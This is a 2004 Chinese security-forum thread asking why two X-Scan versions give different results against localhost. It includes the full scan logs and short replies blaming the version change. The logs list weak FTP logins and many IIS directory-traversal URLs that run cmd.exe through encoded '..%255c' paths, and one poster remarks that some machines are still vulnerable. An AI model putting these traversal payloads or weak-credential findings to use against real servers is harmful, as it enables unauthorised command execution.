|
 | 作者: wangsong [wangsong]
 论坛用户 |
登录 |
| 扫描同一个机子为什么结果不一样呢? 这是用X-scan2.3扫描的结果: [127.0.0.1]: 正在检测"开放端口" ... [127.0.0.1]: 端口21开放: FTP (Control) [127.0.0.1]: 端口25开放: SMTP, Simple Mail Transfer Protocol [127.0.0.1]: 端口119开放: Network News Transfer Protocol [127.0.0.1]: 端口80开放: HTTP, World Wide Web [127.0.0.1]: 端口53开放: domain, Domain Name Server [127.0.0.1]: 端口135开放: Location Service [127.0.0.1]: 端口443开放: HttpS, Secure HTTP [127.0.0.1]: "开放端口"扫描完成, 发现 7. [127.0.0.1]: 正在检测"Snmp信息" ... [127.0.0.1]: "Snmp信息"扫描完成. [127.0.0.1]: 正在检测"SSL漏洞" ... [127.0.0.1]: "SSL漏洞"扫描完成. [127.0.0.1]: 正在检测"RPC漏洞" ... [127.0.0.1]: 无法与主机"127.0.0.1"建立连接 [127.0.0.1]: "RPC漏洞"扫描完成. [127.0.0.1]: 正在检测"SQL-Server弱口令" ... [127.0.0.1]: 无法与主机"127.0.0.1"建立连接 [127.0.0.1]: "SQL-Server弱口令"扫描完成. [127.0.0.1]: 正在检测"FTP弱口令" ... [127.0.0.1]: 发现 FTP弱口令: ftp/[空口令] [127.0.0.1]: "FTP弱口令"扫描完成, 发现 1. [127.0.0.1]: 正在检测"NT-Server弱口令" ... [127.0.0.1]: "NT-Server弱口令"扫描完成. [127.0.0.1]: 正在检测"NetBios信息" ... [127.0.0.1]: 获取Netbios信息"远程注册表信息"完成 [127.0.0.1]: 建立IPC$空会话失败 [127.0.0.1]: "NetBios信息"扫描完成. [127.0.0.1]: 正在检测"SMTP漏洞" ... [127.0.0.1]: "SMTP漏洞"扫描完成. [127.0.0.1]: 正在检测"POP3弱口令" ... [127.0.0.1]: 无法与主机"127.0.0.1"建立连接 [127.0.0.1]: "POP3弱口令"扫描完成. [127.0.0.1]: 正在检测"CGI漏洞" ... [127.0.0.1]: 正在检测"HTTP重定向错误页面" ... [127.0.0.1]: 正在检测"CGI漏洞" ... [127.0.0.1]: 发现 CGI漏洞: /iissamples/exair/search/qfullhit.htw [127.0.0.1]: 发现 CGI漏洞: /iissamples/issamples/oop/qfullhit.htw [127.0.0.1]: 发现 CGI漏洞: /iissamples/issamples/oop/qsumrhit.htw [127.0.0.1]: 发现 CGI漏洞: /scripts/samples/search/qsumrhit.htw [127.0.0.1]: 发现 CGI漏洞: /iishelp/iis/misc/iirturnh.htw [127.0.0.1]: 发现 CGI漏洞: /iissamples/exair/search/qsumrhit.htw [127.0.0.1]: 发现 CGI漏洞: /scripts/samples/search/qfullhit.htw [127.0.0.1]: 发现 CGI漏洞: /null.idq [127.0.0.1]: 发现 CGI漏洞: /null.ida [127.0.0.1]: 发现 CGI漏洞: /abczxv.htw [127.0.0.1]: 发现 CGI漏洞: /iissamples/sdk/asp/docs/codebrws.asp [127.0.0.1]: 发现 CGI漏洞: /msadc/msadcs.dll [127.0.0.1]: "CGI漏洞"扫描完成, 发现 12. [127.0.0.1]: 正在检测"IIS漏洞" ... [127.0.0.1]: 正在检测"HTTP重定向错误页面" ... [127.0.0.1]: 正在检测"IIS漏洞" ... [127.0.0.1]: 发现 IIS漏洞: /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /msadc/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /msadc/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ [127.0.0.1]: 发现 IIS漏洞: /scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\ [127.0.0.1]: 发现 IIS漏洞: /scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ [127.0.0.1]: 发现 IIS漏洞: /scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\ [127.0.0.1]: 发现 IIS漏洞: /msadc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /msadc/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /MSADC/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir [127.0.0.1]: 发现 IIS漏洞: /scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\ [127.0.0.1]: 可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞 [127.0.0.1]: 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida) [127.0.0.1]: 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq) [127.0.0.1]: "IIS漏洞"扫描完成, 发现 33. 这是用X-SCAN3.0扫描的结果; [127.0.0.1]: 发现 "存活主机". [127.0.0.1]: 21/tcp - A FTP server is running on this port. [127.0.0.1]: 25/tcp - A SMTP server is running on this port [127.0.0.1]: 53/tcp - Maybe the "domain, Domain Name Server" service running on this port. [127.0.0.1]: 80/tcp - A web server is running on this port [127.0.0.1]: 443/tcp - Maybe the "HttpS, Secure HTTP" service running on this port. [127.0.0.1]: 135/tcp - Maybe the "Location Service" service running on this port. [127.0.0.1]: "开放服务"扫描完成, 发现 6. [127.0.0.1]: 发现FTP弱口令 "ftp/[口令与用户名相同]" [127.0.0.1]: 发现FTP弱口令 "anonymous/[口令与用户名相同]" [127.0.0.1]: "FTP弱口令"扫描完成, 发现 2. [127.0.0.1]: 21/tcp - FTP Server type and version [127.0.0.1]: 135/tcp - Enumerates the remote DCE services [127.0.0.1]: 1025/tcp - Enumerates the remote DCE services [127.0.0.1]: 1026/tcp - Enumerates the remote DCE services [127.0.0.1]: 1029/tcp - Enumerates the remote DCE services [127.0.0.1]: 1031/tcp - Enumerates the remote DCE services [127.0.0.1]: 1030/udp - Enumerates the remote DCE services [127.0.0.1]: 1032/udp - Enumerates the remote DCE services [127.0.0.1]: 80/tcp - Directory Scanner [127.0.0.1]: 25/tcp - SMTP Server type and version [127.0.0.1]: 21/tcp - Checks if the remote ftp server accepts anonymous logins [127.0.0.1]: 21/tcp - Checks for a NULL Windows Administrator FTP password [127.0.0.1]: 80/tcp - HTTP Server type and version [127.0.0.1]: 25/tcp - Checks if the remote mail server can be used as a spam relay [127.0.0.1]: 80/tcp - Determines if arbitrary commands can be executed [127.0.0.1]: 80/tcp - Tests for IIS .htr ISAPI filter [127.0.0.1]: 80/tcp - Tests for IIS .htr ISAPI filter [127.0.0.1]: 80/tcp - Tests for a remote buffer overflow in IIS [127.0.0.1]: 80/tcp - WebDAV buffer overflow [127.0.0.1]: 80/tcp - Tests for a remote buffer overflow in IIS [127.0.0.1]: "Nessus攻击脚本"扫描完成, 发现 20. |
| 地主 发表时间: 04-02-06 13:19 |
| 回复: amw123456 [amw123456]  论坛用户 |
登录 |
|
http://www.007vod.com/viewmovie.asp?weixiongok |
| B1层 发表时间: 04-02-06 14:13 |
 | 回复: k101 [k101]  论坛用户 |
登录 |
|
我想X-SCAN3.0省去了很多没有用处的IIS漏洞吧! |
| B2层 发表时间: 04-02-06 14:15 |
 | 回复: xfcy800 [xfcy800] 论坛用户 |
登录 |
|
用不同的版本扫描结果当然不同,要不版本就没有升级的必要了。 |
| B3层 发表时间: 04-02-06 18:25 |
 | 回复: lqfrla [lqfrla]  论坛用户 |
登录 |
|
就是 因该是版本问题把 |
| B4层 发表时间: 04-02-06 21:15 |
| 回复: wangsong [wangsong] 论坛用户 |
登录 |
|
为什么没有IIS漏洞呢?放弃了,现在可是还有机器有的呀 |
| B5层 发表时间: 04-02-07 10:26 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 大家看一下为什么?